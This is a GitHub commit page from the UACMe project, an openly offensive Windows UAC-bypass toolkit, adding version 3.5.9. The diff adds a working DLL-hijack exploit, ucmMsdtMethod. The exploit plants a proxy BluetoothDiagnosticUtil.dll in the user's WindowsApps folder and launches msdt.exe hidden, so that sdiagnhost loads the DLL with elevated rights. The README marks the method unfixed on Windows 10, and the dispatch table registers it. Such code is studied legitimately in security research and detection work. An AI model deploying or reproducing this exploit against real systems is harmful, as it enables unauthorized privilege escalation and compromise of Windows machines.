Skip to content

Commit

Permalink
Merge pull request #119 from hfiref0x/v3.5.9
Browse files Browse the repository at this point in the history
v 3.5.9
  • Loading branch information
hfiref0x authored Feb 5, 2022
2 parents 70dffcd + aed8778 commit 92e84a7
Show file tree
Hide file tree
Showing 19 changed files with 231 additions and 106 deletions.
2 changes: 1 addition & 1 deletion LICENSE.md
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
Copyright (c) 2014 - 2021, UACMe authors
Copyright (c) 2014 - 2022, UACMe authors

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
Expand Down
13 changes: 12 additions & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -733,6 +733,16 @@ First parameter is number of method to use, second is optional command (executab
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.8
72. Author: Emeric Nasi
* Type: Dll Hijack
* Method: Dll path search abuse
* Target(s): \syswow64\msdt.exe, \system32\sdiagnhost.exe
* Component(s): BluetoothDiagnosticUtil.dll
* Implementation: ucmMsdtMethod
* Works from: Windows 10 (10240)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.9

</details>

Expand Down Expand Up @@ -835,9 +845,10 @@ https://devblogs.microsoft.com/oldnewthing/20160816-00/?p=94105
* UACMe 3.5, WD and the ways of mitigation, https://swapcontext.blogspot.com/2020/10/uacme-35-wd-and-ways-of-mitigation.html
* UAC bypasses from COMAutoApprovalList, https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html
* Utilizing Programmatic Identifiers (ProgIDs) for UAC Bypasses, https://v3ded.github.io/redteam/utilizing-programmatic-identifiers-progids-for-uac-bypasses
* MSDT DLL Hijack UAC bypass, https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass

# Authors

(c) 2014 - 2021 UACMe Project
(c) 2014 - 2022 UACMe Project

[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Fhfiref0x%2FUACME&count_bg=%2379C83D&title_bg=%23555555&icon=&icon_color=%23E7E7E7&title=hits&edge_flat=false)](https://hits.seeyoufarm.com)
Binary file modified Source/Akagi/bin64res.h
Binary file not shown.
1 change: 1 addition & 0 deletions Source/Akagi/bin64res.rc
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,7 @@
#include "winres.h"
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
IDR_FUBUKI64 RCDATA "bin\\fubuki64.cd"
IDR_FUBUKI32 RCDATA "bin\\fubuki32.cd"
IDR_AKATSUKI64 RCDATA "bin\\akatsuki64.cd"
IDR_KAMIKAZE RCDATA "bin\\kamikaze.cd"
IDR_SECRETS RCDATA "bin\\secrets64.bin"
16 changes: 13 additions & 3 deletions Source/Akagi/global.h
Original file line number Diff line number Diff line change
@@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2021
* (C) COPYRIGHT AUTHORS, 2014 - 2022
*
* TITLE: GLOBAL.H
*
* VERSION: 3.58
* VERSION: 3.59
*
* DATE: 01 Dec 2021
* DATE: 04 Feb 2022
*
* Common header file for the program support routines.
*
Expand Down Expand Up @@ -45,11 +45,13 @@
#include "bin64res.h"
#define FUBUKI_ID IDR_FUBUKI64
#define AKATSUKI_ID IDR_AKATSUKI64
#define FUBUKI32_ID IDR_FUBUKI32
#define KAMIKAZE_ID IDR_KAMIKAZE
#else
#include "bin32res.h"
#define FUBUKI_ID IDR_FUBUKI32
#define AKATSUKI_ID PAYLOAD_ID_NONE //this module unavailable for 32 bit
#define FUBUKI32_ID IDR_FUBUKI32
#define KAMIKAZE_ID IDR_KAMIKAZE
#endif

Expand Down Expand Up @@ -149,5 +151,13 @@ typedef UINT(WINAPI *pfnEntryPoint)(
_In_ BOOL OutputToDebugger
);

typedef struct _UACME_THREAD_CONTEXT {
TEB_ACTIVE_FRAME Frame;
pfnEntryPoint ucmMain;
DWORD ReturnedResult;
ULONG OptionalParameterLength;
LPWSTR OptionalParameter;
} UACME_THREAD_CONTEXT, * PUACME_THREAD_CONTEXT;

extern PUACMECONTEXT g_ctx;
extern HINSTANCE g_hInstance;
13 changes: 4 additions & 9 deletions Source/Akagi/main.c
Original file line number Diff line number Diff line change
@@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2021
* (C) COPYRIGHT AUTHORS, 2014 - 2022
*
* TITLE: MAIN.C
*
* VERSION: 3.57
* VERSION: 3.59
*
* DATE: 01 Nov 2021
* DATE: 02 Feb 2022
*
* Program entry point.
*
Expand Down Expand Up @@ -217,10 +217,5 @@ NTSTATUS WINAPI ucmMain(
#pragma comment(linker, "/ENTRY:main")
VOID __cdecl main()
{
#ifdef _WIN64
__writegsqword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), (DWORD_PTR)ucmMain);
#else
__writefsdword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), (DWORD_PTR)ucmMain);
#endif
ExitProcess(StubInit());
ExitProcess(StubInit(ucmMain));
}
99 changes: 96 additions & 3 deletions Source/Akagi/methods/hybrids.c
Original file line number Diff line number Diff line change
@@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2021
* (C) COPYRIGHT AUTHORS, 2015 - 2022
*
* TITLE: HYBRIDS.C
*
* VERSION: 3.58
* VERSION: 3.59
*
* DATE: 01 Dec 2021
* DATE: 02 Feb 2022
*
* Hybrid UAC bypass methods.
*
Expand Down Expand Up @@ -1045,3 +1045,96 @@ NTSTATUS ucmJunctionMethod(

return MethodResult;
}

/*
* ucmMsdtMethod
*
* Purpose:
*
* Bypass UAC by dll hijack of sdiagnhost.
* https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass
*
*/
NTSTATUS ucmMsdtMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
BOOLEAN bCleanupNeeded = FALSE;
UINT i;
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
#ifndef _WIN64
NTSTATUS ntStatus = STATUS_ACCESS_DENIED;
#endif
WCHAR szPath[MAX_PATH * 2];
WCHAR szApp[MAX_PATH + 1];
WCHAR szParams[MAX_PATH * 2];

#ifndef _WIN64
if (g_ctx->IsWow64) {
ntStatus = supEnableDisableWow64Redirection(TRUE);
if (!NT_SUCCESS(ntStatus))
return ntStatus;
}
#endif

do {

RtlSecureZeroMemory(&szPath, sizeof(szPath));
if (!SHGetSpecialFolderPath(NULL, (LPWSTR)&szPath, CSIDL_LOCAL_APPDATA, FALSE))
break;

supConcatenatePaths(szPath, TEXT("Microsoft\\WindowsApps"), MAX_PATH);
supConcatenatePaths(szPath, BLUETOOTHDIAGNOSTICUTIL_DLL, MAX_PATH);

if (!supWriteBufferToFile(szPath, ProxyDll, ProxyDllSize))
break;

bCleanupNeeded = TRUE;

_strcpy(szApp, g_ctx->szSystemRoot);
supConcatenatePaths(szApp, SYSWOW64_DIR, MAX_PATH);
supConcatenatePaths(szApp, MSDT_EXE, MAX_PATH);

_strcpy(szParams, TEXT("-path "));
_strcat(szParams, g_ctx->szSystemRoot);
_strcat(szParams, TEXT("diagnostics\\index\\BluetoothDiagnostic.xml -skip yes"));

if (supRunProcess2(szApp,
szParams,
NULL,
SW_HIDE,
10000))
{
MethodResult = STATUS_SUCCESS;
}

} while (FALSE);


if (bCleanupNeeded) {
i = 5;
do {

if (DeleteFile(szPath))
break;

Sleep(1000);
i--;
} while (i);

}


#ifndef _WIN64
if (g_ctx->IsWow64) {
supEnableDisableWow64Redirection(FALSE);
}
#endif

#ifdef _DEBUG
supSetGlobalCompletionEvent();
#endif

return MethodResult;
}
10 changes: 7 additions & 3 deletions Source/Akagi/methods/hybrids.h
Original file line number Diff line number Diff line change
@@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2021
* (C) COPYRIGHT AUTHORS, 2015 - 2022
*
* TITLE: HYBRIDS.H
*
* VERSION: 3.57
* VERSION: 3.59
*
* DATE: 01 Nov 2020
* DATE: 02 Feb 2022
*
* Prototypes and definitions for hybrid methods.
*
Expand Down Expand Up @@ -53,6 +53,10 @@ NTSTATUS ucmJunctionMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);

NTSTATUS ucmMsdtMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);

//
// Post execution cleanup routines.
//
Expand Down
17 changes: 13 additions & 4 deletions Source/Akagi/methods/methods.c
Original file line number Diff line number Diff line change
@@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2021
* (C) COPYRIGHT AUTHORS, 2015 - 2022
*
* TITLE: METHODS.C
*
* VERSION: 3.58
* VERSION: 3.59
*
* DATE: 01 Dec 2021
* DATE: 04 Feb 2022
*
* UAC bypass dispatch.
*
Expand Down Expand Up @@ -45,6 +45,7 @@ UCM_API(MethodFwCplLua2);
UCM_API(MethodProtocolHijack);
UCM_API(MethodPca);
UCM_API(MethodCurVer);
UCM_API(MethodMsdt);

ULONG UCM_WIN32_NOT_IMPLEMENTED[] = {
UacMethodWow64Logger,
Expand Down Expand Up @@ -131,7 +132,8 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodProtocolHijack, { NT_WIN10_REDSTONE5, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
{ MethodPca, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodCurVer, { NT_WIN10_THRESHOLD1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodNICPoison, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }
{ MethodNICPoison, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodMsdt, { NT_WIN10_THRESHOLD1, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE }
};

/*
Expand Down Expand Up @@ -746,3 +748,10 @@ UCM_API(MethodCurVer)

#endif
}

UCM_API(MethodMsdt)
{
return ucmMsdtMethod(
Parameter->PayloadCode,
Parameter->PayloadSize);
}
7 changes: 4 additions & 3 deletions Source/Akagi/methods/methods.h
Original file line number Diff line number Diff line change
@@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2021
* (C) COPYRIGHT AUTHORS, 2014 - 2022
*
* TITLE: METHODS.H
*
* VERSION: 3.58
* VERSION: 3.59
*
* DATE: 21 Nov 2021
* DATE: 04 Feb 2022
*
* Prototypes and definitions for UAC bypass methods table.
*
Expand Down Expand Up @@ -91,6 +91,7 @@ typedef enum _UCM_METHOD {
UacMethodPca, //+
UacMethodCurVer, //+
UacMethodNICPoison2, //+
UacMethodMsdt, //+
UacMethodMax,
UacMethodInvalid = 0xabcdef
} UCM_METHOD;
Expand Down
Loading

0 comments on commit 92e84a7

Please sign in to comment.